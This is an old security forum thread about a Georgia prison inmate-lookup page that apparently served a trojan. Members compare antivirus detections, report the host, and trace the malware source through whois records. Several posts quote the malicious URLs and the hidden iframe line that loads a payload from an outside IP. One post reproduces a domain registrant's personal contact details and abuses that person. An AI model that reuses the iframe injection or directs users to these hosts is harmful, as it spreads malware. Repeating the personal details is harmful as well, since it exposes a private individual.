I was searching for an appropriate website to find out information on a "freaking animal" who shot and killed a dear friend of mine 16 years ago (long and sad story for her). He is (was, he has recently been released, Ugh) serving "life", and as a simple begining I used the term Ga. inmate query, what came up was a large variety of results and I just began clicking them one at a time to find the correct one.

Is anyone else detecting it by clicking this link? Or am I going insane?

>>>>>WARNING THIS LINK MAY CONTAIN A TROJAN HORSE<<<<<<<

http://inmates.gidor.com/ga-prison-inmate-query.php

>>>>>WARNING THE ABOVE LINK MAY CONTAIN A TROJAN HORSE<<<<

I am showing a W32/Sober@MM!M681, which is outdated but still around.

I thought W32/Sober was an E-Mail Virii...........

Anyone else getting it?

And no I did not click on the Prn Ad.


P:

Hmmmm!

Strange sites you frequent old chap? :D

It did not appear to do anything for me..................and I had a fair bit running...........no attempt to run a naughty script or amend the Registry............I was running 3 AVs and two anti-malwares at the time (yes, I know you don't do that............but I was at least hoping that a detection would provoke a crash?)

MM is a mass mailer, and that detection stuff hasn't noticed any attempt to use my e-mail, or send anything out.

What were you using that detected it?

I had:

1. AVG
2. Avast!
3. Clam
4. Win Patrol
5. WinPooch
6. Teatimer
7. SpyDefense
8. Ewido (interactive)
9. SpywareBlaster
10. RegistryProt

And they saw nothing?

No reaction from the firewall or mail protector either

:(

Nice find Galdron.. :)

i had my AV pick 'em up, I kept a copy in the Quarantine, and the other pair are now on a usb hdd to take a look at in the next few minutes.

can .zip 'em up and email at request.. :)

cheers
acidtone..:)

nihil: You run all those apps at once?

For some reason... I could have sworn that running multiple av's and antispyware apps at the same time could cause problems? Not to mention... a huge waste of resources?

I run only avast with as a limited user (using runas when I need admin) and I've never had any issues...

Strange sites you frequent old chap?

If you need *that* much protection... I'd think that the sites you frequent may be a bit strange?

Anyway, I visited that site with firefox 1.5.0.6 with adblock and noscript along with avast running. No warnings on my side. (I didn't enable the ads or scripting.)

Greeting's

I dont run multiple AV's (infact I've never installed multiple AV's) but some how my anti-virus (updated) doesnt pick up anything too??? Whats wrong here ??

I disabled Noscript in Firefox but still no virus was picked up ??

Hey Phish~ I have them all sitting on this box, I just activated them all (one at a time and slowly so as to avoid a crash) then visited the site :D like I said I was expecting any sort of detection to trigger a crash............ it can sometimes work with one that none of them can individually identify ;)

I was using FF 1.5.0.6 with script and advert blocking on.

From a previous post, this is the ByteVerify trojan....................that is about 3 years old and you should be patched against it by now? This is Win 2000 SP4, and may not be susceptible anyway? IIRC it is something to do with Java and unpatched versions of the MS virtual machine?

Perhaps Galdron has one of those proactive/aggressive AV's that scanned the page, rather than waiting for something to attack the home machine?

The MM worm would certainly seem to be a false positive, or misidentification?

The worm was picked up by Macafee in a split second as soon as I clicked on the link to the page. I then attempted to Quaranteen it, and it would not allow me to do so. I grabbed the "Stinger' from Macafee.com and took care of it.

I am in the process of contacting the website host to give them the heads up.




:cool:

Were you using firefox or IE?

Hi acidtone, can you submit them to these sites:

http://virusscan.jotti.org/

http://www.virustotal.com/en/indexf.html

It would be interesting to see what the major AV products make of them?

:)

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909449) by muert0
Were you using firefox or IE?


Firefox, latest version.

:)

FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.
<iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
That site is down with a message saying the account is suspected due to violation of AUP - good.

Kinda hoped to pull down that horsie and analyze and disect it, oh well.

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909536) by ric-o
FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.

That site is down with a message saying the account is suspected due to violation of AUP - good.

Kinda hoped to pull down that horsie and analyze and disect it, oh well.


Still a live link, just got another (same one as before) Trojan in my Quar.

W32/Sober@MM!M681


:eek:

http ://85.255.113.10/ ?to=GLAC&from=se-all&type= se-all

One Whois lookup says its from the Ukraine.... another says its from Belarus:

Country fraud profile: High

Georgia prison wardens......Ukranian mafioso....
Hmmm

One Whois lookup says its from the Ukraine.... another says its from Belarus:

same area of land
and Georgia is also out there too
not just in the USofA :eek:

maybe that's how you picked such a lovely site :D

and clicking the link sent AVG nuts
got two hits

those two hits have different dates on em
but I am certain I've checked the vault recently, and I haven't sent anything else there for a while

No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.

:rolleyes:

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909604) by Galdron
No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.

:rolleyes:

You might try DShield/ISC/SANS's fight back...just report it to them, maybe you'll even get a mention in their daily diary ;) That's what I usually do to submit things semi-anonymously :)

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909457) by nihil
Hi acidtone, can you submit them to these sites:

http://virusscan.jotti.org/

http://www.virustotal.com/en/indexf.html

It would be interesting to see what the major AV products make of them?

:)

Nihil, i've already submitted them, i did so about 30minutes after catching them into an contained environment.

cheers
acidtone..:)

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909605) by nebulus200
You might try DShield/ISC/SANS's fight back...just report it to them, maybe you'll even get a mention in their daily diary ;) That's what I usually do to submit things semi-anonymously :)


Done deal.

:D

Damnit I am obsessed!


OK so I just can't let this one go, after Zero response to both methods (telephone, and e-mail) to the host of the offending website, I am once again digging for more info.


I did report it to DShield, and they are so backed up it will take a while for them to "act", which means they will send an e-mail to the Sysadmin, and hope that action will be taken. Basically the same thing I have attempted.

Knowing that the Horsie is there, I have no fear in rooting around within the site. I noticed today that the actual Trojan originates from the following site. Apparently notorious for this activity and also registered in Russia..........good luck getting any results from these guys right?

The site you will notice serves no purpose, other than to support the Downloader/Trojan, and god knows what else.

http://proffy209.com/

Dig-

Registrant:
Boris D Gorbunov boris@bo.ca
7.49800872092
Boris D Gorbunov
Proletarskaya 3-10
Nijnoy Novgorod Nijniy Novgorod RUSSIAN FEDERATION 180092
Domain Name: proffy209.com
Record last updated at 2006-07-13 12: 42: 55
Record created on 2006/7/13
Record expired on 2007/7/13
Domain servers in listed order:
ns1.game4all.biz ns2.game4all.biz
Administrator:
name: (Boris D Gorbunov)
Email: boris@bo.ca
tel-- 7.49800872092
Boris D Gorbunov
Proletarskaya 3-10


Boris I would like to kick your Caviar eating a$$.

The Virus itself is also known as TR/Dldr.Tibs.C, which copies itself to • %SYSDIR%\kernels8.exe, is a Multifaceted little bugger.

Further info can be found @ link below.

http://www.avira.com/en/threats/section/fulldetails/id_vir/2246/tr_dldr.tibs.c.html


Any thoughts/Ideas/suggestions regarding these A$$hats would be great. I am on a mission.

:p